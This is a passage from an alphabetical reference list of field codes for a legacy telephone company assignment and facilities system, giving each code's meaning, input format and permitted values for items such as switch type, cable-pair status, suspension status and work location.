X X=Numeric RCT Recent Change Type RCT XX 1=1ESS Office 1A=1AESS Office 2=2ESS (LO1) 2E=2ESS (EF1 and EF2) 3=3ESS 5T=5ESS RCW Recent Change Keyword RCW XX...XX XX...XX=Maximum of 20 Alphanumeric Characters RD Release Date RD MM-DD-YY MM=Month DD=Day YY=Year RDG Message Register Reading RDG XXXX XXXX=Four Numeric Characters REC Record File Name and Number REC FFXXXXXX FF=File Name (Alphanumeric) XXXXXX=Record Number (Maximum of 6 Numeric Characters) REP Reprint Option REP X Y=Yes N=No RESP Send a Solicited Response RESP X S=Solicited Response REW Rework Status REW X Y=Yes N=No RLF Re-using DIPs Upper Bound Load Factor RLF X X=1-9 RLO Automatic Relay Assignment Present RLO X Y=Yes N=No RLY Miscellaneous Relay RLY XX...XX XX...XX=Maximum of 10 Alphanumeric Characters RMK Remarks on Orders RMK XX...XX XX...XX=Maximum of 28 Alphanumeric Characters RMKG Hunt Group Remarks RMKG XX...XX XX...XX=Maximum of 30 Alphanumeric Characters RMKO Remarks on Office Equipment RMKO XX...XX XX...XX=Maximum of 12 Alphanumeric Characters RMKP Remarks on Cable Pair RMKP XX...XX XX...XX=Maximum of 14 Alphanumeric Characters RMKT Remarks on Telephone Number RMKT XX...XX XX...XX=Maximum of 14 Alphanumeric Characters RNO RSS Subentity Number RNO XX XX=01-63 RTI Route Index RTI XXXX XXXX=Maximum of 4 Numeric Characters RTYP Relay Type RTYP XXX TBA=Tens Block Auxiliary SC=Sleeve Connect AR=Advance RTZ Rate Zone RTZ X X=Numeric RW Recent Change Work RW X N=Recent Change Message not Required C=Recent Change Coordination Required RZ Resistance Zone RZ XX XX=Two Numeric Characters SBS Sub-status SBS X A=Area Transfer C=Cut Through D=Dedicated L=Cut Through and Dedicated !=Blank SC Sleeve Connect Relay SC SYY-ZZZ S=Marker Group (Numeric) YY=Number Group Frame (Numeric) ZZZ=Relay Number (Numeric) SE Special Service Equipment Number SE XX...XX XX...XX=Maximum of 52 Alphanumeric Characters SET Single Entity Tag SET X Y=CP is Served by a Single Entity on a Single Frame !=CP Can be Served by More Than One Entity SG Service Segment SG X B=Business C=Coin D=Data R=Residence S=Special SGN Common Language Segment Number SGN XXX XXX=Maximum of 3 Alphanumeric Characters SIS Special Identifying Telephone Number Supplement SIS XXXX XXXX=Maximum of 4 Numeric Characters SIT Special Identifying Telephone Number SIT XXX-YYY-XXXX X=Numeric Y=Numeric SK Skip Option SK X X=0 or 2-9 SN Sequence Number SN XXX XXX=1-999 SOB Service Observing Tag SOB XXX XXX=YES or NO SS Suspension Status SS XX DB=Deny Both Ways DI=Deny Incoming DO=Deny Outgoing RS=Restore Suspended Circuit SB=Suspend Both Ways SD=Season Disconnect SI=Suspend Incoming SO=Suspend Outgoing DX=Deny Toll Access Tervice SSV Suspend Service Type SSV XX DO=Deny Outward Service DB=Deny Both Outward and Inward Service DX=Deny Toll Access Service RS=Restore Denied Service STAT Order Status STAT XX AC=Pending With no Framd or Installation Completion FC=Pending With Frame Completion but no Installation Completion IC=Pending with Installation Complation but no Frame Completion CC=Completed Orders CA=Canceled Orders STAT Facility Status STAT XX AS=All Spare EX=Excluded PC=Pending Connect RS=Reserved SF=Spare Facility UK=Unknown WK=Working STAT Load Group Status STAT XX EX=Blocked from all Assignments FU=Open for Dial Transfer Assignments Only PS=Pseudo LEN Assignments Only SO=Open for Service Orders and Work Orders Only WK=Open for All Assignments STO Line Equipment Status STO XX AW=All Working MS=Miscellaneous OF=Official TJ=Trunk and Junctor TS=Test WK=Working PD=Pending Disconnect PK Pending Disconnect/Pending New Connect AS=All Spare EX=Excluded LI=Left-in Disconnect RS=Reserved SF=Spare UK=Unknown PC=Pending Connect STP Cable and Pair Status STP XX AL=All Pairs AD=All Defective AP=All Provisioned AW=All Working DC=Designed Circuit DI=Defective (I=1-9) DM=Designed + SSM DP=Designed + SSP SM=Special Safeguard Measures SP=Special Safeguard Protection SS=Special Status WK=Working AS=All Spare EX=Excluded LI=Left-in Disconnect RS=Reserved SF=Spare UK=Unknown PC=Pending Connect PD=Pending Disconnect STT Telephone Number Status STT XX AU=Auxiliary AW=All Working MS=Miscellaneous NP=Non-published OF=Official TJ=Trunk and Junctor TS=Test WK=Working AS=All Spare AV=Available CM=Changed-Machine Intercept CO=Changed-Operator Intercept DM=Disconnected-Machine Intercept DO=Disconnected-Operator Intercept EX=Excluded RS=Reserved SF=Spare UK=Unknown PC=Pending Connect PD=Pending Disconnect PK=Pending Disconnect/Pending New Connect SUBL Sublet Service SUBL XXX-XXXX XXX-XXXX=Telephone Number SWC Set Work Code SWC XXX (See Print Work Code) SWG Switch Group SWG X X=0-2 SYS Machine Number SYS XX...XX XX...XX=Maximum of 12 Alphanumeric Characters TA Transfer Assembly TA X Y=Yes N=No TAP Touchtone Assignment Priority Number TAP X X=Numeric TBA TBA Relay TBA XYY-ZZZ X=Marker Group Number (Numeric) YY=Number Group Frame (Numeric) ZZZ=Relay Number (Numeric) TBS TBS Relay TBS XZ-NN X=Marker Group Number (0-9) Z=Relay Number (0-3) NN=Ringing Combination (01-16) TC TO Cable TX XX...XX XX...XX=Maximum of 10 Alphanumeric Characters TER Terminal TER XXXX XXXX=Maximum of 4 Numeric Characters TER Terminal Number TER Y-XXXX-ZZZZ Y=Control Group (Alphanumeric) XXXX=Group Number (Numeric) ZZZZ=Terminal Number (Numeric) THG Thousands Group THG X or THG XXXX X=0-9 XXXX=0000,1000,...,9000 TK Trunk Cable and Pair Number TK YYYYYY-XXXX YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters) XXXX=Cable Pair ID (Maximum of 4 Numeric Characters) TLI Telephone Line Identifier TLI XXX-YYY-XXXX X=Numeric Y=Alphanumeric TN Telephone Number TN XXX-XXXX XXX-XXXX=Telephone Number TOM Two or More Non-pending, Non-party Filtered Circuit Facilities TOM XX CP=Cable Pair TN=Telephone Number OE=Office Equipment TP Tie Pair TP YY...YY-XXXX YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters) XXXX=Tie Pair ID (Maximum of 4 Numeric Characters) TPR Taper Code TPR XXXXXX XXXXXX=Maximum of 6 Alphanumeric Characters TRE Transmission Equipment TRE XX...XX XX...XX=Maximum of 17 Alphanumeric Characters TT Telephone Number Type TT X B=POTs Hunting C=Coin G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc) O=Official Q=Centrex X=POTx Non-hunting TTA Terminating Traffic Area TTA XXX XXX=Maximum of 3 Alphanumeric Characters TYP Switching Type TYP XXX 1ES=Number 1ESS 2ES=Number 2ESS 3ES=Number 3ESS 5ES=Number 5ESS RSS=Remote Switching System 1XB=Number 1 Cross-bar 5XB=Number 5 Cross-bar SXS=Step-by-step DMX=DMS-10 DMC=DMS-100 US USOC US XXXXX XXXXX=Maximum of 5 Alphanumeric Characters USE Entity Usage USE X G=Growth S=Stable VAL Minimum Valid Hours for Entity Data VAL XX XX=1-99 WC Wire Center WC XX XX=Alphanumeric WL Work Location WL Y Y=1-8 or WL XXX ADM=Administrative ACT=Assignment Change Ticket CPC=Special Service Circuits MCT=Maintenance Change Tickets WPN Work Package Number WPN XXXX XXXX=1-9999 WPT Work Package Type WPT XXX XXX=Maximum of 3 Alphanumeric Characters XN "X" Number XN XXX-YYXX or XN XXX-YXX X=Numeric Y=Alphanumeric ZN Zone Location ZN XXX XXX=001-999 =============================================================================